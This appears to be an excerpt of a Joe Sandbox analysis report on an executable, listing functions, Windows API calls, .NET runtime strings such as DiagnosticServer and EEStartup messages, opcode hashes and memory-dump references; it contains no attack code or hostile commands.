Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: d3cc074e1caf6124c09b060c4ccb975327eabf6a0c53d19bad70924476dd3c00
Instruction ID: 5454385183d52ba8473b2347e2ed1e094afaa2c7d05413b02488fabbc90edcdc
Opcode Fuzzy Hash: d3cc074e1caf6124c09b060c4ccb975327eabf6a0c53d19bad70924476dd3c00
Instruction Fuzzy Hash: 4E01A731710304EBEB10ABBADC05F5B77EDEB95710F108479F508C7351EA75E90086A5

Function 05449D8B Relevance: 1.7, Strings: 1, Instructions: 476COMMON

Download Yara Rule

Strings

D, xrefs: 05449F01

Memory Dump Source

Source File: 00000000.00000002.1709251567.0000000005440000.00000020.00001000.00040000.00000000.sdmp, Offset: 05440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5440000_file.jbxd

Similarity

API ID:
String ID: D
API String ID: 0-2746444292
Opcode ID: 846120759b95c00f1b086e71a257920b09817d712222fb17086ba924b5d07183
Instruction ID: 661019e368f821b032555b11c67cde38f781ba15f6fbd1a423cd9e3a9e1f4e9c
Opcode Fuzzy Hash: 846120759b95c00f1b086e71a257920b09817d712222fb17086ba924b5d07183
Instruction Fuzzy Hash: 4532E574D45269CFDB28CF65D858BEEBBB2BF49301F1081EAD40AA6380DB315A85CF51

Function 009846C0 Relevance: 1.6, APIs: 1, Instructions: 81COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNELBASE(?,?,?,?,?,?), ref: 00984762

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: 367b2283952d2a64e6bbcfb18109ff5794342b9f255340ef2bc3e1f774ab16a6
Instruction ID: e3c6cca06058a362dc376321afcead7009ab30fc17f23bdd70853a6c0a2a1706
Opcode Fuzzy Hash: 367b2283952d2a64e6bbcfb18109ff5794342b9f255340ef2bc3e1f774ab16a6
Instruction Fuzzy Hash: 5821B235A0020A8BCF24FF65C448BAD77EDEF95324F1140A9E8058B352EB79DE45CB90

Function 05445911 Relevance: .6, Instructions: 598COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1709251567.0000000005440000.00000020.00001000.00040000.00000000.sdmp, Offset: 05440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5440000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b224ebcd11e0036beb688075c6f47ad86c706316ec948d750f693cc36ad7c15
Instruction ID: 36dc5e13ba5137d6e1a839fc9da2c0d1f0012b1c8a0e80611cdadb39cfbb23f4
Opcode Fuzzy Hash: 9b224ebcd11e0036beb688075c6f47ad86c706316ec948d750f693cc36ad7c15
Instruction Fuzzy Hash: AF22F272A406098BEF28CE68C9A16FEB7E2FF45314F25822ED5679B394D7349905CF40

Function 05445600 Relevance: .2, Instructions: 249COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1709251567.0000000005440000.00000020.00001000.00040000.00000000.sdmp, Offset: 05440000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5440000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7f4cd2fb011dd555f87368e15d343bd40710e1adbd8fb9f91b9c305403488e79
Instruction ID: fdd14651b8627c5ac39475edb5d712380d26cccfa8eb0c6aa2576b440ee6f1bc
Opcode Fuzzy Hash: 7f4cd2fb011dd555f87368e15d343bd40710e1adbd8fb9f91b9c305403488e79
Instruction Fuzzy Hash: 86811533A856548BFF25CA60C8947FE37A3FF42260F1982AFD85657294E730484ACF51

Function 00A33370 Relevance: 44.1, APIs: 15, Strings: 10, Instructions: 375
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00974900: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,00C7A98C,?,0088D4DA), ref: 00974950

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00A33408
HeapFree.KERNEL32(00000000,?), ref: 00A33487

Part of subcall function 00A33120: strtok_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00D1958C,00000000,00000000,?,00000000,00A3353E), ref: 00A33138
Part of subcall function 00A33120: strtok_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00D1958C,?), ref: 00A33184

_stricmp.API-MS-WIN-CRT-STRING-L1-1-0(?,listen,00000000,00000000), ref: 00A33624
isspace.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 00A336E5
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00A337C1
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00A337E4
free.API-MS-WIN-CRT-HEAP-L1-1-0 ref: 00A3380D
free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 00A33830
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 00A3383F

Strings

ds_ipc_stream_factory_configure - Diagnostic Port creation %s, xrefs: 00A33773
nosuspend, xrefs: 00A3365B
suspend, xrefs: 00A33676
ds_port_builder_set_tag - Unknown tag '%s'., xrefs: 00A336AB
connect, xrefs: 00A3363C
listen, xrefs: 00A3361E
ds_ipc_stream_factory_configure - Ignoring port configuration with empty address, xrefs: 00A3370D
failed, xrefs: 00A33765
succeeded, xrefs: 00A3376A, 00A33772
ds_ipc_stream_factory_configure - Attempted to create Diagnostic Port from "%s"., xrefs: 00A33574

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: free$FreeHeapstrtok_s$ByteCharMultiWide_stricmpisspace
String ID: connect$ds_ipc_stream_factory_configure - Attempted to create Diagnostic Port from "%s".$ds_ipc_stream_factory_configure - Diagnostic Port creation %s$ds_ipc_stream_factory_configure - Ignoring port configuration with empty address$ds_port_builder_set_tag - Unknown tag '%s'.$failed$listen$nosuspend$succeeded$suspend
API String ID: 1069159200-1518389490
Opcode ID: 854ddc351e4906b54c1ca4fde4c097715a2879a3ac96d34d5d3d9105f4c3320f
Instruction ID: efaca834a3c17094a1ab99514ab9d4043bf5b4acbdcadbfed7f0cb4037f70a1f
Opcode Fuzzy Hash: 854ddc351e4906b54c1ca4fde4c097715a2879a3ac96d34d5d3d9105f4c3320f
Instruction Fuzzy Hash: 34E1F5B1A083109FDF209F15DC557AABBB5AF84700F1442A8F909AB381DBB29F54CF51

Function 00B75C70 Relevance: 38.8, APIs: 12, Strings: 10, Instructions: 284
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNELBASE(00DAB198,BBFE6088,00000000,?,00000000), ref: 00B75CFC
SetConsoleCtrlHandler.KERNEL32(00B75B20,00000001,?,00000000), ref: 00B75D1D
GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000), ref: 00B75D28
GetProcAddress.KERNEL32(00000000,InitializeContext2), ref: 00B75D34
GetModuleHandleW.KERNEL32(ntdll.dll,?,00000000), ref: 00B75D44
GetProcAddress.KERNEL32(00000000,RtlRestoreContext), ref: 00B75D56
InitializeCriticalSection.KERNEL32(00DAAF00,?,00000000), ref: 00B75DA4
InitializeCriticalSection.KERNEL32(00DAAF24,?,00000000), ref: 00B75DD5
InitializeCriticalSection.KERNEL32(00DAABD0,?,00000000), ref: 00B75E06
InitializeCriticalSection.KERNEL32(00DAB0C8,?,00000000), ref: 00B75E39

Part of subcall function 00A28E40: GetActiveProcessorGroupCount.KERNEL32 ref: 00A28E79
Part of subcall function 00A28E40: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(0000000C,?,000000A1,?,?,?,00B75EBE,00710000,?,?,00000000), ref: 00A28EB0

InitializeCriticalSection.KERNEL32(00DAAF94,?,00000000,?,00710000,00000000,00710000,?,?,00000000), ref: 00B75FC2
DebugBreak.KERNEL32(?,00000000), ref: 00B765C2

Part of subcall function 00974900: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,00C7A98C,?,0088D4DA), ref: 00974950

DebugBreak.KERNEL32(?,00000000,?,00710000,00000000,00710000,?,?,00000000), ref: 00B760D4
SleepEx.KERNEL32(00000000,00000000,?,00000000,?,00710000,00000000,00710000,?,?,00000000), ref: 00B760EF
InitializeCriticalSection.KERNEL32(00DAAFE4,?,00000000,?,00710000,00000000,00710000,?,?,00000000), ref: 00B76109
InitializeCriticalSection.KERNEL32(00DAAB90,?,00000000,?,00710000,00000000,00710000,?,?,00000000), ref: 00B76146

Strings

g_pConfig->sync(), xrefs: 00B76065, 00B76084
InitializeContext2, xrefs: 00B75D2E
kernel32.dll, xrefs: 00B75D23
EnsureRtlFunctions(), xrefs: 00B7601D
ntdll.dll, xrefs: 00B75D3F
%s completed, xrefs: 00B76022, 00B76089
%s failed with code %x, xrefs: 00B7606A
Returned successfully from InitThreadManager, xrefs: 00B75EA9
===================EEStartup Starting===================, xrefs: 00B75FF6
RtlRestoreContext, xrefs: 00B75D50

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: CriticalInitializeSection$AddressBreakDebugHandleModuleProc$ActiveConsoleCountCtrlFreeGroupHandlerHeapInfoProcessorSleepSystemmalloc
String ID: %s completed$%s failed with code %x$===================EEStartup Starting===================$EnsureRtlFunctions()$InitializeContext2$Returned successfully from InitThreadManager$RtlRestoreContext$g_pConfig->sync()$kernel32.dll$ntdll.dll
API String ID: 3857905088-983475224
Opcode ID: 486fb9d7887b18b21b51f5668d0df7dbbd6730c2f1325d445b394d7d25b42fda
Instruction ID: 68f5af38e9e051060d56568d925c805a822f2999211e0c846f6aae7f4d0d0f51
Opcode Fuzzy Hash: 486fb9d7887b18b21b51f5668d0df7dbbd6730c2f1325d445b394d7d25b42fda
Instruction Fuzzy Hash: 1EC1BDB0A04344EFDB14EFA9E856B9E7BB0EB45300F108159F419E7392EBB48944CB72

Function 007D8B20 Relevance: 26.6, APIs: 5, Strings: 10, Instructions: 300
memorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,00010000,00001000,00000040,BBFE6088,00000000,?,00000000,?,00000000), ref: 007D8BA6
VirtualProtect.KERNEL32(00C08D58,00000129,00000040,?,BBFE6088,00000000,?,00000000,?,00000000), ref: 007D8E4C
TlsAlloc.KERNEL32(?,?,00000000,?,00000000), ref: 007D8E8E
SetThreadStackGuarantee.KERNELBASE(?), ref: 007D8EAD
GetLastError.KERNEL32(?,00C08858,?,00C08E50,?,00C08E20,?,00C08DF0,?,00C08D90,?,00C08DC0,?,00C08D60,?,00000000), ref: 007D8EB7

Strings

(BYTE*)JIT_PatchedCodeLast - (BYTE*)JIT_PatchedCodeStart > (ptrdiff_t)0, xrefs: 007D8EFA
@WriteBarrier, xrefs: 007D8E18, 007D8E31
D:\a\_work\1\s\src\coreclr\vm\threads.cpp, xrefs: 007D8F04, 007D8F18
@WriteBarrierEAX, xrefs: 007D8C5D
@WriteBarrierECX, xrefs: 007D8CA9
(BYTE*)JIT_PatchedCodeLast - (BYTE*)JIT_PatchedCodeStart < (ptrdiff_t)GetOsPageSize(), xrefs: 007D8F0E
@WriteBarrierEDI, xrefs: 007D8D8D
@WriteBarrierESI, xrefs: 007D8D41
@WriteBarrierEBP, xrefs: 007D8DD9
@WriteBarrierEBX, xrefs: 007D8CF5

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: AllocVirtual$ErrorGuaranteeLastProtectStackThread
String ID: (BYTE*)JIT_PatchedCodeLast - (BYTE*)JIT_PatchedCodeStart < (ptrdiff_t)GetOsPageSize()$(BYTE*)JIT_PatchedCodeLast - (BYTE*)JIT_PatchedCodeStart > (ptrdiff_t)0$@WriteBarrier$@WriteBarrierEAX$@WriteBarrierEBP$@WriteBarrierEBX$@WriteBarrierECX$@WriteBarrierEDI$@WriteBarrierESI$D:\a\_work\1\s\src\coreclr\vm\threads.cpp
API String ID: 979057948-337905575
Opcode ID: a61365791ba53096c2fa83616b22b59d6a36018d89e52709097e8537f3df2d9d
Instruction ID: 20da6323113d9ae5fb7b4dc0ec1711c1c8d54dd0a18210442559506b9b76819e
Opcode Fuzzy Hash: a61365791ba53096c2fa83616b22b59d6a36018d89e52709097e8537f3df2d9d
Instruction Fuzzy Hash: 70A1D0F5604342DBCB549B28D896B773B7AEB56300B04863BB586DB3D1DE398C089772

Function 00A31B00 Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 286
memorythreadstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 00A31B16
SetThreadDescription.KERNELBASE ref: 00A31B30

Part of subcall function 009AC7A0: ReadFile.KERNEL32(?,?,?,00000000,00000004,?,00000000,?,00000000,?,00A31B9D,00000014,?), ref: 009AC7BF
Part of subcall function 009AC7A0: GetLastError.KERNEL32(?,00000000,?,00000000,?,00A31B9D,00000014,?), ref: 009AC7CE
Part of subcall function 009AC7A0: GetOverlappedResult.KERNEL32(?,00000004,00000000,00000001,?,00000000,?,00000000,?,00A31B9D,00000014,?), ref: 009AC7E5

HeapFree.KERNEL32(00000000,00000000,?,?,?,00000014,?), ref: 00A31C34
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,DOTNET_IPC_V1,00000014,?), ref: 00A31C17

Part of subcall function 0096F430: GetProcessHeap.KERNEL32(BBFE6088,00000000,00000000,00C13410,000000FF,?,00983D82), ref: 0096F45E
Part of subcall function 0096F430: RtlAllocateHeap.NTDLL(03400000,00000000,00000030,BBFE6088,00000000,00000000,00C13410,000000FF,?,00983D82), ref: 0096F47A

HeapFree.KERNEL32(00000000,00000000,00000014,?), ref: 00A31C5E
HeapFree.KERNEL32(00000000,?,?,00000000), ref: 00A31DB4
FlushFileBuffers.KERNEL32(?,?,00000000), ref: 00A31DBD
HeapFree.KERNEL32(00000000,?), ref: 00A31DCF

Strings

.NET EventPipe, xrefs: 00A31B24
Diagnostics IPC listener was undefined, xrefs: 00A31EB9
Received unknown request type (%d), xrefs: 00A31E35, 00A31E8B
DiagnosticServer - received IPC message with command set (%d) and command id (%d), xrefs: 00A31CA5
DOTNET_IPC_V1, xrefs: 00A31C11

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: Heap$Free$FileThread$AllocateBuffersCurrentDescriptionErrorFlushLastOverlappedProcessReadResultstrcmp
String ID: .NET EventPipe$DOTNET_IPC_V1$DiagnosticServer - received IPC message with command set (%d) and command id (%d)$Diagnostics IPC listener was undefined$Received unknown request type (%d)
API String ID: 1528069343-1097641503
Opcode ID: a7a990847a100eb20cdf02290a96851939908f677570c26acbb95b47daab60d7
Instruction ID: 5f6f131d41f3db9c6dd117331650d3c0283c1e5c9d33b3b1cdc4614b5024bd68
Opcode Fuzzy Hash: a7a990847a100eb20cdf02290a96851939908f677570c26acbb95b47daab60d7
Instruction Fuzzy Hash: 41A1FE71608341ABD710AB24ED15B7FB7E9AFE5700F40151DF881C72A1EB79DA00C7A2

Function 007D9660 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 175
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(BBFE6088,?,?), ref: 007D96CC
GetCurrentThread.KERNEL32 ref: 007D96DD
OpenThreadToken.ADVAPI32(00000000), ref: 007D96E4
RevertToSelf.ADVAPI32(?,?,BBFE6088,?,?), ref: 007D96EE
GetCurrentThread.KERNEL32 ref: 007D971B
DuplicateHandle.KERNELBASE(00A28217,00000000), ref: 007D9725
SetThreadToken.ADVAPI32(00000000,000000FF), ref: 007D9756
CloseHandle.KERNELBASE(000000FF), ref: 007D97A2
_controlfp_s.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,00000300,BBFE6088,?,?), ref: 007D97D1

Strings

UndoRevert/SetThreadToken failed for hToken = %d, xrefs: 007D9772
SetupThread managed Thread %p Thread Id = %x, xrefs: 007D96A5

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: Thread$Current$HandleToken$CloseDuplicateOpenProcessRevertSelf_controlfp_s
String ID: SetupThread managed Thread %p Thread Id = %x$UndoRevert/SetThreadToken failed for hToken = %d
API String ID: 2317356610-1638468778
Opcode ID: c8e8c003d1859a59d7629abdd76e346c51b5dc54cfa65243a6240bf6924bb2cf
Instruction ID: 0afd8d9cef3386327803acbb2e26226c303febb13504afa2291560f95eaac492
Opcode Fuzzy Hash: c8e8c003d1859a59d7629abdd76e346c51b5dc54cfa65243a6240bf6924bb2cf
Instruction Fuzzy Hash: B351E971A00745AFDB20AF65DC45B9EB7F8EF45B20F10422AFA19E23D0EB7499048B61

Function 00A31F00 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 172
pipeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00A30940: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000018,?,00000000,?,00A35118,?,00000000,?,?,?,?,?,00A355E7), ref: 00A30945
Part of subcall function 00A30940: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,?,?,00A355E7,?,?,?,00A31E0D), ref: 00A30993

CoCreateGuid.COMBASE(00DB6310,00000000,?,00000000,?,?,00000000), ref: 00A31F71
CloseHandle.KERNEL32(?,?,?), ref: 00A32031
DisconnectNamedPipe.KERNEL32(?,?,?), ref: 00A3205B
CloseHandle.KERNEL32(?,?,?), ref: 00A32067
CloseHandle.KERNEL32(?,?,?), ref: 00A32083
FlushFileBuffers.KERNEL32(?,?,?), ref: 00A320CB
DisconnectNamedPipe.KERNEL32(?,?,?), ref: 00A320DA

Strings

At least one Diagnostic Port failed to be configured., xrefs: 00A31F95
Failed to create diagnostic server thread (%d)., xrefs: 00A32155

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DA8000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DAD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706929208.0000000000DB6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1707445149.0000000000DBD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_file.jbxd

Similarity

API ID: CloseHandle$DisconnectNamedPipe$BuffersCreateFileFlushGuidfreemalloc
String ID: At least one Diagnostic Port failed to be configured.$Failed to create diagnostic server thread (%d).
API String ID: 3534690289-1000282211
Opcode ID: e99b628b82a2d1bbcc639306c8c92a87ccc51919713681896438483ad1dd8628
Instruction ID: 4d1d1b5de05783c82610b562238a9f502559e0cd1a66de7b9d3b43cfda2d590d
Opcode Fuzzy Hash: e99b628b82a2d1bbcc639306c8c92a87ccc51919713681896438483ad1dd8628
Instruction Fuzzy Hash: 1251CF71500740CBCB309F29EE4A79AB7E4AB46324F044B19F9A9872E1D775E849CBA1

Function 00B78560 Relevance: 19.8, APIs: 13, Instructions: 323
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,BBFE6088,?,00000000), ref: 00B7864B
CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,BBFE6088), ref: 00B7869C
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,BBFE6088,?,00000000), ref: 00B786B1
MapViewOfFileEx.KERNELBASE(00000000,00000004,?,?,?,00000000,?,?,?,?,?,?,?,?,?,BBFE6088), ref: 00B78707
UnmapViewOfFile.KERNEL32(00000024,?,?,?,?,?,?,?,?,?,BBFE6088,?,00000000), ref: 00B78720
CreateFileMappingW.KERNEL32(000000FF,00000000,00000004,?,?,00000000,?,?,?,?,?,?,?,?,?,BBFE6088), ref: 00B7875C

Part of subcall function 0087ED30: GetFileSize.KERNEL32(?,?,0000002C,?,00B7863C,?,?,?,?,?,?,?,?,?,BBFE6088,?), ref: 0087ED38
Part of subcall function 0087ED30: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,BBFE6088,?,00000000), ref: 0087ED45
Part of subcall function 0087ED30: SetLastError.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,BBFE6088,?,00000000), ref: 0087ED58

UnmapViewOfFile.KERNEL32(?,?,?,00000000,?,000000F1,00000000,00000000,00000000,00000001), ref: 00B7880D
CloseHandle.KERNEL32(?,?,?,00000000,?,000000F1,00000000,00000000,00000000,00000001), ref: 00B78830
CloseHandle.KERNEL32(00000000,?,?,00000000,?,000000F1,00000000,00000000,00000000,00000001), ref: 00B78856
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,BBFE6088,?,00000000), ref: 00B788A4
SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?,BBFE6088,?,00000000), ref: 00B788B0
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,BBFE6088,00000000,0000002C), ref: 00B7891A
UnmapViewOfFile.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,BBFE6088,00000000,0000002C), ref: 00B7893D

Part of subcall function 00BC4410: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,0000002C,00000000,?,00B7889A,?,?,00000000,?,000000F1,00000000,00000000,00000000,00000001), ref: 00BC449C

Memory Dump Source

Source File: 00000000.00000002.1704898366.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.1704877163.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1705796071.0000000000C63000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706840904.0000000000DA3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1706876104.0000000000DA6000.00000008.00000001.01000000.00000003.sdmpDownload File
